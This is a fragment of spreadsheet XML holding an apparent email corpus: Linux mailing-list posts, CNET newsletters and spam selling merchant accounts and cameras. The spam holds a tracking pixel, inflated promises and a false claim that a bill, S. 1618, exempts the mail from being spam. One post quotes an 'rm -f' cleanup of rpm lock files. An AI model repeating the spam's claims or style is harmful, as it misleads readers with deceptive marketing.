 and yes, spammers could try to set up a system to reply to my confirm
 messages, but that would require them to a) give out a valid email address
 in their From headers, and b) use a lot more bandwidth then they do now
 (thereby costing them more money).
 oh, and they can't forge confirm messages.  the confirm message system
 works something like this:
     message goes in the pending q and is assigned an id.
     that id is encrypted and used to create the from address of the
 	outgoing confirm mail - kevin+confirm+kghdsfg@ie.suberic.net
     only a message to that address will work to free the message from
 	the q (or i can free it using tmda-pending).
 all of this is discussed on http://tmda.sf.net/
 kevin
 -- 
 kevin@suberic.net     that a believer is happier than a skeptic is no more to
 fork()'ed on 37058400    the point than the fact that a drunken man is happier
 meatspace place: home       than a sober one. the happiness of credulity is a
 http://ie.suberic.net/~kevin   cheap &amp; dangerous quality -- g.b. shaw
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Thank you for signing up for the Internationalfreecall.com mailing list.
 Soon we will show you how to make free international and free domestic phone calls.
 The information on making free international calls will come after a short series of emails, so please wait a couple of days for the series of emails to arrive.  In the meantime, you can always opt-out at any time by clicking on the unsubscribe link at the bottom of each message.
 In addition, for those who qualified for our promotion, we will show you how to receive 160 minutes of free domestic calling.
 Finally, for our customers who order a flat-rate calling product and wish to market this, or another one of their own businesses, I will give a free automated email follow-up system with no catches (this is a $20.00 value!)
 More to come soon. Stay tuned!
 http://www.internationalfreecall.com
 To unsubscribe at any time, click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5576
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Polariod Digital Cameras Only $39.95
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;body BGCOLOR=#FFFFFF&gt;
 &lt;img src="http://track.4optinonly.com/tev.asp?eid=15173" height="1" width="1"&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH=569 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_01.gif" width=569 
 height=52&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=52&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;a 
 href="http://track.4optinonly.com/clicktrack.asp?eid=15173&amp;url=http%3A%2F%2Fstore%2Eyahoo%2Ecom%2Fcgi%2Dbin%2Fclink%3Femailshoppingnetwork%2BKEygys%2B3fun620%2Ehtml"&gt;
 				&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_02.gif" width=569 
 height=71 BORDER=0&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=71&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_03.gif" width=569 
 height=82&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=82&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_04.jpg" width=231 
 height=131&gt;&lt;/TD&gt;
 		&lt;TD COLSPAN=2 ROWSPAN=2&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_05.gif" width=338 
 height=159&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=131&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_06.gif" width=231 
 height=102&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=28&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_07.gif" width=87 
 height=117&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;a 
 href="http://track.4optinonly.com/clicktrack.asp?eid=15173&amp;url=http%3A%2F%2Fstore%2Eyahoo%2Ecom%2Fcgi%2Dbin%2Fclink%3Femailshoppingnetwork%2BKEygys%2B3fun620%2Ehtml"&gt;
 				&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_08.gif" width=251 
 height=74 BORDER=0&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=74&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_09.gif" width=231 
 height=43&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;a 
 href="http://track.4optinonly.com/clicktrack.asp?eid=15173&amp;url=http%3A%2F%2Fstore%2Eyahoo%2Ecom%2Fcgi%2Dbin%2Fclink%3Femailshoppingnetwork%2BKEygys%2B3fun620%2Ehtml"&gt;
 				&lt;IMG 
 SRC="http://64.251.7.133/15173/polaroid620v3_10.gif" width=251 
 height=43 BORDER=0&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG 
 SRC="http://64.251.7.133/15173/spacer.gif" WIDTH=1 HEIGHT=43&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;BR&gt;&lt;HR WIDTH="500"&gt;&lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
    &lt;TR&gt;
      &lt;TD WIDTH="100%"&gt;
        &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;You are receiving this email
        as a subscriber to the eNetwork mailing list. To remove yourself
        from this and related email lists click here:&lt;BR&gt;
        &lt;a href="mailto:remove@4optinonly.com"&gt;UNSUBSCRIBE MY 
 EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
        &lt;P&gt;&lt;FONT SIZE="-2" FACE="Verdana"&gt;&lt;BR&gt;
        Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
        301, Paragraph(a)(2)of S. 1618, a letter cannot be considered
        Spam if the sender includes contact information and a method
        of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
      &lt;/TD&gt;
    &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Coady wrote:
 &gt; Oops, I tend to feel like that most times! I tend to feel that if we
 &gt; have extremely good compilation tools, then those tools should be able
 &gt; to do the inlining and optimisation far better than I could. That's the
 &gt; theory anyway :) And there's always a tradeoff with inlining between
 &gt; speed and memory bloat (which may sometimes be no tradeoff if swap
 &gt; starts getting involved...)
 &lt;mild rant&gt;
 This is something that often annoys me. Programmers can spend hours inlining
 code and relying on optimisation tools to improve performance. The best
 performance improvement can be obtained by fixing the algorithm.
 Most function calls get made very rarely. Optimising them often makes no
 sense, produces illegable code and nonsense algorithms.
 Inlining will help in functions that get called frequently and are small -
 such as string manipulation routines. But these are a small part of most
 applications.
 One example I frequently see is people optimising a database function call.
 Most database accesses involve many abstraction layers and millions of
 instruction cycles. Trying to save a few instruction cycles would be a cost
 saving of, say, 5 seconds in 20 hours.
 But a simple hashmap cache of common data without any compiler or inline
 optimisations can turn that same 20 hours into 10 minutes.
 &lt;/mild rant&gt;
 - Matthew (who really should be writing code)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</si>
  <si>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Subject: Call me                    05152
</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | DOWNLOAD DISPATCH(Mac Edition)
 July 9, 2002
 Vol. 7, No. 27
 Using a Mac and today's music software, musicians are finding
 that they can create, record, and master their songs without
 the need to pay for expensive studio time. Deck, our Pick of
 the Week, offers a multitrack audio workstation that can take 
 care of all your recording needs, and it's even optimized for 
 OS X. Not just great for music, Deck can be used for film, video,
 and numerous other applications. Get on Deck:
 http://clickthru.online.com/Click?q=ca-iciuQUgFRLpNVUXcl8jfOfRHHUnR 
 Also this week, we've got Captain FTP, for an easy way to
 transfer files; AquilaCalendar, to get you organized under OS X;
 Tex-Edit Plus, a full-featured alternative to the pricier
 text editors; and Boom, a remake of one of the great classic
 arcade games.
 Enjoy!
 Jason Parker
 Assistant Editor, CNET Download.com
 --
 (Unsubscribe instructions are at the bottom of this
 newsletter.)
 &lt;---------------Advertisement---------------&gt;
 Gateway Thin &amp; Light PCs - starting at $1,499!
 Thin and Light, the Gateway(R) 450 blends price, performance,
 and portability.  Systems include Mobile Intel(R) Pentium(R)
 4-M processors, 14.1" and 15" XGA TFT Active Matrix display 
 options, and your choice of operating systems.
 http://clickthru.online.com/Click?q=df-1kJhQLEFHEClWsofbQq-Kh1XhaeR 
 &lt;-------------------------------------------&gt;
 IN THIS ISSUE:
 1. This Week's Top 10 Downloads
 2. Pick of the Week: Deck
 3. The Week in Wares:
              - Internet: Captain FTP
              - Home and Education: AquilaCalendar
              - Development Tools: Tex-Edit Plus
              - Games: Boom
 4. Updates &amp; Drivers
 5. The Week in Reviews: Mac OS X 10.1 prices
 6. Overheard on Download.com
 7. Download.com Outage Notice
 P.S. Got a suggestion for CNET Download.com? Send it to:
 suggestions@download.com
 _____________________________________________________________
 1. This Week's Top 10 Downloads
    1. LimeWire 2.4.4                         5,715 downloads
    2. MacSatellite  1.6.1                    4,402 downloads
    3. LimeWire (OS X) 2.4.4                  4,043 downloads
    4. Hotline Connect Client 1.8.5           3,690 downloads
    5. RealPlayer 8.0                         2,730 downloads
    6. Sound Studio 2.0.3                     2,690 downloads
    7. Internet Explorer 5.1.4                1,949 downloads
    8. Fetch 4.0.1                            1,914 downloads
    9. OmniWeb (OS X) 4.1                     1,732 downloads
   10. DivX for OS X 1.1.8                    1,602 downloads
 For more details on Download.com's most popular files, click
 here: http://clickthru.online.com/Click?q=f5-lTbRQgwx12_yoFk6DmLwgkaZmRPR 
 ______________________________________________________________
 2. Pick of the Week
    DECK
    Version: 3.5
    File size: 6.6MB
    License: Free to try; $399.00 to buy
    Minimum Requirements: Mac OS 9.x or Mac OS X
    Looking for a professional, multitrack audio workstation
    under OS X? This entry from BIAS, while maybe not the most
    attractive Mac app on the block, gives you some hefty
    editing functionality--whether you're working in broadcast,
    film, video, or any other multimedia environment. The big
    brother to BIAS' cheaper Deck LE, Deck 3.5 lets you process
    soundtracks, edit dialogue, spot effects, and record
    ADR-style voice-overs. Deck also supports surround mixing and
    up to four real-time effects plug-ins per track for music
    production. A good value, and one of the first of its kind
    to hit OS X, this midrange app deserves a listen. You're on
    Deck:
    http://clickthru.online.com/Click?q=0a-ZnKCIrrscnFX3e0Bwhq6GOxuYznR 
    Want to review Deck? Submit your opinion here:
    http://clickthru.online.com/Click?q=1f-rvwqI58w5yO75pM1xmYgHobjqmeR 
    Find all of our Picks here:
    http://clickthru.online.com/Click?q=34-pJpSIcd819N9rTb3_tvVyn4IcgyR 
 ______________________________________________________________
 3. The Week in Wares
    IN INTERNET:
    CAPTAIN FTP
    Version: 1.3
    File size: 793K
    License: Free
    Minimum requirements: Mac OS X
    Designed completely from scratch to work with OS X, Captain
    FTP is a new client that makes finding, uploading, and
    downloading files online easier than ever. Since it makes
    full use of OS X's multithreaded multitasking capabilities,
    you can set up as many simultaneous connections as you like
    without slowing down other work on your Mac too much. The
    program supports drag-and-drop operation and resuming
    interrupted downloads. It also sports a built-in address
    book, and integrated BBEdit links. The interface deserves
    awards for clarity and good looks. Grab files in style:
    http://clickthru.online.com/Click?q=49-ZM4cIEpSenMA07qVX4RVXFO5JSFR 
    Want to review Captain FTP? Submit your opinion here:
    http://clickthru.online.com/Click?q=5e-ssGdIn06tVeUdrZhsnStcVTQzc9R 
    Find all of the latest Internet software here:
    http://clickthru.online.com/Click?q=73-__ZeIBBtWIiA9y3T8UEE0WNrUZcR 
    IN HOME AND EDUCATION:
    AQUILACALENDAR
    Version: 1.19
    File size: 1.63MB
    License: Free to try; $20.00 to buy
    Minimum Requirements: Mac OS X
    One of the most frustrating things about off-the-shelf
    organizer applications is that they try to force everyone to
    keep track of things in the same way. AquilaCalendar is
    refreshingly different: you can design your own calendar
    windows, choosing from a plethora of basic options (day,
    week, month, year, several months together, and so on), customize
    your calendar with colors and fonts, and more. To-do lists
    and notes-to-self can be added to calendars or you can add a
    handy clock and holiday markers, among other options. The
    interface fits with the OS X design theme, and makes getting
    organized no more difficult than it has to be. Get organized:
    http://clickthru.online.com/Click?q=88-ec5PQQKx6IOkSTY-rU358atSBbiR 
    Want to review AquilaCalendar? Submit your opinion here:
    http://clickthru.online.com/Click?q=9e-tWQoQtMQJGrFWgHHSCN0U7nQUD4R 
    Find all of the latest home and education software here:
    http://clickthru.online.com/Click?q=b3-QHzxQYKTqehBCndAE64qDAwrPGrR 
    IN DEVELOPMENT TOOLS:
    TEX-EDIT PLUS
    Version: 4.1.3
    File size: 1.17MB
    License: Free to try; $15.00 to buy
    Minimum Requirements: System 7.x
    Before you spend the big bucks on a HTML editor, make sure
    you check out Tex-Edit Plus. This handy little editor offers
    all the basics like unlimited Undo and Redo commands,
    translucent drag-and-drop capabilities, several text styles,
    and the option to highlight selected text. Also, you'll be
    able to use it to act as a text editor for an FTP client
    such as Fetch, Interarchy, NetFinder, or Transmit. Text
    editing made easy:
    http://clickthru.online.com/Click?q=c8-2lPnQWOzdD19YnmMKE-nFr99H2iR 
    Want to review Tex-Edit Plus? Submit your opinion here:
    http://clickthru.online.com/Click?q=dd-tpm0QzWd3Dhh1zgGZP85eXsJh-PR 
    Find all of the latest utilities here:
    http://clickthru.online.com/Click?q=f2-OZVTQUwWCeG9s_A0pvVdi5Z7ednR 
    IN GAMES:
    BOOM
    Version: 1.3
    File size: 2.3MB
    License: Free to try, $15 to buy
    Minimum Requirements: Mac OS 8.x/OS 9.x/OS X
    Remember the classic arcade game Bomberman? Even if you
    don't, you should take this remake of the old classic for a
    spin. Maneuver your way through a maze of corridors while
    setting off bombs to clear a path for your escape. You'll
    also need to pick up coins for extra points and stay clear
    of those nasty aliens to stay alive. Blast your way through
    eight alien-infested areas, each one divided into 10
    subzones, and kick the Big Alien Boss back to where he came
    from. Blast away:
    http://clickthru.online.com/Click?q=07-HqCzI5rq9T_hx8KiqzUbrvLkiDeR 
    Want to review Boom? Submit your opinion here:
    http://clickthru.online.com/Click?q=1c-cs_iIFr43mGGwPjn9kgGa2oXqGyR 
    Find all of the latest games here:
    http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3J9vREDFWVhZSgRXBnR 
 ______________________________________________________________
 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features
    IN INTERNET:
    - DupliMizer 2.4 
      http://clickthru.online.com/Click?q=47-ADmxIIZH1jE333KOiJGu_NEsnEuR 
    - Web Site Maestro 1.2
      http://clickthru.online.com/Click?q=5c-BnjPIZnPblJYt8W53xlZk0f-IosR 
    - Surfer 2.0
      http://clickthru.online.com/Click?q=71-GwdUIEZcfHewddAqwuBXvl3NU2FR 
    IN MULTIMEDIA &amp; DESIGN:
    - Photo Album Builder 1.2
      http://clickthru.online.com/Click?q=86-8fH1QCJonnxDZ9JSjaeTldfVpf4R 
    - Cartoon Editor 1.2.1
      http://clickthru.online.com/Click?q=9b-7-TFQSIo2p0Ld1d0dAVJ9PZAKTrR 
    IN UTILITIES:
    - Battery Endurance Measurer 1.3
      http://clickthru.online.com/Click?q=b0-NZmfQQJr-SlQoW6dxQMKtNX8PQiR 
    - Pixel Tester 2.0
      http://clickthru.online.com/Click?q=c5-8BcDQzOaF-iJTk_zSROUJEymxqPR 
    - SerialStorage 1.0
      http://clickthru.online.com/Click?q=da-dT8jQUPq_nOG5djbjsMVKpv3DxnR 
    IN BUSINESS AND FINANCE:
    - Gym Organizer 6.5
      http://clickthru.online.com/Click?q=ef-04uYQmkHvFhT_HKqBxDVAmoBameR 
    - ChartConstructor 1.0.1
      http://clickthru.online.com/Click?q=04-k9W0IFQXFQMPpsA98BbBL7kOi_yR 
    IN HOME AND EDUCATION:
    - WeatherMan 1.6
      http://clickthru.online.com/Click?q=19-BLe0I2rXOrA0zLlKMZ2Fz8IR7XlR 
    - Computer Cuisine Deluxe 3.1
      http://clickthru.online.com/Click?q=2f-hYaFIqnzAaNFrW5P26D_8gaZjMeR 
 _______________________________________________________________
 5. The Week in Reviews:
    Mac OS X 10.1 prices
    If you haven't made the switch to Apple's beautiful and
    powerful operating system, check out these prices, which may
    change your mind.
    http://clickthru.online.com/Click?q=44-9nxfIZUtYM5fxvgEMLKlXBDgnVsR 
 _______________________________________________________________
 6. Overheard on Download.com
    Here are some user comments about an alternative MP3 player
    for the Mac:
    "Small, Low CPU Usage, Easy"
    "Excellent Alternative"
    "Neat, discreet, powerful"
    "It blows my mind!"
    "One of the best to date!"
    So what's the name of this mystery download? Click here to
    find out:
    http://clickthru.online.com/Click?q=59-y53oIEnthMZswNYlpW-B_KMqztFR 
 _______________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.org
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=6e-2aLjz4Er1KcnmbRj35jce-nUPINqj9RR
 To receive your newsletter in HTML format, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=83-U-BXQYJ7lFvC8zVtuoAABMMPZ9rR 
 To learn about advertising opportunities in CNET Newsletters, click here:
 http://clickthru.online.com/Click?q=98-FTaOQ_zabmh0qdlCW5CH7esbKRiR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Increase Sales, Accept Credit Cards! [6fqtt]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We provide businesses of ALL types an opportunity to have their own
 no hassle Credit Card Merchant Account with NO setup fees. Good
 credit, bad credit, no credit -- not a problem! 95% approval rate!
 You will be able to accept all major credit cards including Visa,
 MasterCard, American Express and Discover, as well as debit cards,
 ATM and check guarantee services. You will have the ability to
 accept E-checks over the Internet with a secure server. To insure
 that you wont miss a sale, you will be able to accept checks by
 Phone or Fax. We can handle ANY business and client type!
 If you already have a merchant account we can lower your rates
 substantially with the most competitive rates in the industry and
 state of the art equipment and software. We will tailor a program
 to fit your budget and you wont pay a premium for this incredible
 service!
 If you are a U.S. or Canadian citizen and are interested in finding
 out additional information or to speak with one of our reps, reply
 to this email and include the following contact information: Your
 Name, Phone Number (with Area/Country code), and if possible, a
 best time to call. One of our sales reps will get back to you
 shortly. Thank you for your time.
 If you wish to be removed from our mailing list, please reply to
 this email with the subject "Remove" and you will not receive
 future emails from our company.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Visa ~ MasterCard ~ American Express ~ Etc. [ll4k4]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Increase your revenues  by accepting Credit Cards and Checks!
 Visa ~ MasterCard ~ American Express   ~ Check Guarantee   ~ Electronic Internet checks
 Increase Sales w/4 Powerful Words !!!
 We Accept Credit Cards
 Today, the world of E-business is moving faster everyday. And your customers expect every payment option, or they may take their business elsewhere. And that means lost sales! IF YOU SELL A PRODUCT OR SERVICE YOU NEED A MERCHANT ACCOUNT! Some Internet merchants have seen sales increases as high as 1500%! Offering a wide variety of easy payment options for your customers increases impulse buying and helps sell expensive items.
 Complete E-COMMERCE solutions to accept VISA, MasterCard, American Express and Checks for your website, online store, traditional storefront or home based business.
 for more information please visit our FAQ
 http://medlem.tripodnet.nu/jja8888
 ========================
 Or Submit Your Information Via Email
 NAME:
 PHONENUMBER:
 AND BEST TIME TO CALL:
 ========================
 Thank you 
 To be removed type remove in the subject line
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt; Once upon a time, ""Angles" wrote :
 &gt; 
 &gt; 
 &gt;&gt;Any sage advice on the most painless way to upgrade from old limbo (.92)
 &gt;&gt;to new limbo (.93)?
 &gt;&gt;
 &gt;&gt;Apt for rpm from the 7.3 days barely works on Limbo1, and the package:
 &gt;&gt;apt-0.5.4cnc6-dwd2.src.rpm will not compile on the Libbo1 box (I was
 &gt;&gt;going to use that to dist-upgrade to Limbo2).
 &gt; 
 &gt; 
 &gt; Well, the 7.3 binary should work as long as you install the "rpm404" (IIRC)
 &gt; compatibility library. The only problem I have with some rpm 4.1 versions
 &gt; is that it sometimes hangs at the and of operations (-e, -i, -F or -U) and
 &gt; the only workaround is to kill it, "rm -f /var/lib/rpm/__*" and try again.
 Well, you're lucky if it sometimes works for you.  Mine hang all the 
 time, have to kill 'em with -9.  And after that, rpm doesn't work at all 
 (hangs right after i run the command, prints nothing).  Have to reboot 
 the machine to get anything rpm-related to work again.
 &gt; Matthias
 -silent
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Gregory Alan Bolcer:
 &gt;I'm not sure since I haven't attended civics class
 &gt;in quite some time, but the First Amendment doesn't cover protected speech, 
 &gt;hate speech, or actions. ..
 The first two are wrong. The first amendment DOES
 protect speech the Supreme Court decides it protects
 (duh!), and that happens to include most of what
 people consider hate speech. Unlike many other
 nations, the US has no laws against hate speech, per
 se. And the first amendment is the reason for that.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: MAC Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_mac.gif" width="442" height="60" border="0" alt="CNET Shopper Mac Edition"&gt;&lt;br&gt;
 				&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#000000" colspan=3&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#000000" width=1 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td width=10 rowspan=2&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 						&lt;td  width=430&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;				
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#000000"&gt;
 							&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
       		&lt;/table&gt;	
 &lt;!-- Right column --&gt;
 		&lt;/td&gt;
 		&lt;td width=160 rowspan=2&gt;
 			&lt;img src="http://www.cnet.com/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 &lt;!-- advertisement label gif --&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 					&lt;tr&gt;
 						&lt;td align=middle bgcolor="#eeeeee"&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 &lt;!-- /advertisement label gif --&gt;
 &lt;!-- insert ad here --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /insert ad here --&gt;
 &lt;br&gt;
 &lt;!-- search box --&gt;
 				&lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;
 					&lt;form method=get action="http://www.search.com/redirect"&gt;
 						&lt;tr valign=top&gt;
 							&lt;td&gt;
 								&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 									&lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 									&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 										&lt;select name=target class=frmel&gt;
 											&lt;option value="http://shopper.cnet.com/shopping/search/results/1,10214,0-1257,00.html?tag=&amp;qt=%%q%%&amp;cn=&amp;ca=1257"&gt;Shopper
 											&lt;option value="http://cnet.search.com/search?tag=ex.shopper.dispatch.srch.cnet"&gt;All CNET
 											&lt;option value="http://www.search.com/search?tag=ex.shopper.dispatch.srch.web"&gt;The Web
 										&lt;/select&gt;&amp;nbsp;
 									&lt;input type=submit value="Go!"&gt;
 								&lt;/font&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/form&gt;
 				&lt;/table&gt;
 			&lt;p&gt;
 &lt;!-- search box --&gt;
 &lt;!--Most PoP--&gt;
 &lt;img src="http://home.cnet.com/i/nl/sh/rhc_mostpop.gif" alt="Most Popular" width="150" height="20" border="0"&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding=2 cellspacing=0 border=0 style="padding-top:5px"&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;1&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKOQURC20Xvsg9tyQFWvZR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6paohCvOP2463LvvI2rgYdR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BadhxhBx7h8FdMkmoOwzcR" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxwjkBDJn3ufz1Jey2fPRR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVkrp7FY12-JM2mPpt29eFR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXJh47F_DpiaRL6DCwol9R" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2CK73CEhNv0T0QkY6b7uR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;
 &lt;!-- Vertical Brick --&gt;
